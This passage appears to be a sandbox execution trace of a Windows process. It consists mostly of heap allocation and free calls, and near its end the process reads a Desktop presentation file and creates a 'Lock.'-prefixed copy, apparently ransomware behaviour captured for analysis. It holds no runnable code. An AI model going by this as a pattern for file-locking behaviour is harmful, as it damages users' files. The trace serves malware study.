hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac168 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1f8 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac090 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abe50 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac270 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1e0 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac060 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac240 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac228 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac0f0 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4708 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac288 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2b8 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2638 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfa0 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf88 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac150 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf70 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac018 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abef8 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfd0 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf28 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac000 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac048 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab088 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abe20 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1c8 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1b0 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac138 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac120 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac108 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac078 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac198 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac210 | out: hHeap=0x25c0000) returned 1 [0158.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0158.687] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0158.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2638 [0158.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac210 [0158.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac198 [0158.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2698 [0158.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac078 [0158.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2698 [0158.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac108 [0158.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac120 [0158.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0158.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac138 [0158.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0158.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac138 | out: hHeap=0x25c0000) returned 1 [0158.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac120 | out: hHeap=0x25c0000) returned 1 [0158.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac108 | out: hHeap=0x25c0000) returned 1 [0158.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac108 [0158.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2698 [0158.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac198 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac078 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac108 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac210 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2638 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2c8 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab298 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3d58 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f98 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4438 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf58 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b20a8 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b26f8 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b26e8 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abdc0 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56f8 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2648 | out: hHeap=0x25c0000) returned 1 [0158.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56d0 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf10 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b5748 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2668 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b5720 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abee0 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf40 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abd90 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac030 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfe8 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2a0 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2778 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abe98 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b48c0 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2608 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4898 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2f8 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4528 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4578 | out: hHeap=0x25c0000) returned 1 [0158.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2e0 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b44b0 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1ef8 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4410 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abdd8 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfb8 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b5798 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2678 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b5770 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f48 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa998 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0158.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0158.691] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0158.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0158.691] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0158.691] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0158.691] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0158.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa998 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f48 [0158.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0158.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f48 | out: hHeap=0x25c0000) returned 1 [0158.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0158.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa998 | out: hHeap=0x25c0000) returned 1 [0158.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0158.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0158.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0158.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0158.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0158.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0158.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/0AFNgyUK36kK5YHPO1.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0afngyuk36kk5yhpo1.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0158.692] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.692] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0158.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0158.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0158.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0158.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0158.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0158.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0158.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0158.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0158.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0158.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0158.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0158.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0158.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0158.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0158.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0158.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0158.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0158.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0158.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0158.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0158.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0158.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0158.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0158.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f48 [0158.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa998 [0158.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f48 | out: hHeap=0x25c0000) returned 1 [0158.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa998 | out: hHeap=0x25c0000) returned 1 [0158.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0158.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0158.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0158.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0158.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0158.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0158.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0158.694] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0158.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0158.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0158.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0158.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0158.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0158.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0158.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.0AFNgyUK36kK5YHPO1.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.0afngyuk36kk5yhpo1.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0158.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0158.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1f48 [0158.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0158.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0158.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0158.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0158.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0158.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0158.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1be8 | out: hHeap=0x25c0000) returned 1 [0158.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0158.696] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1be8 [0158.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1be8 | out: hHeap=0x25c0000) returned 1 [0158.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0158.696] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0158.696] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 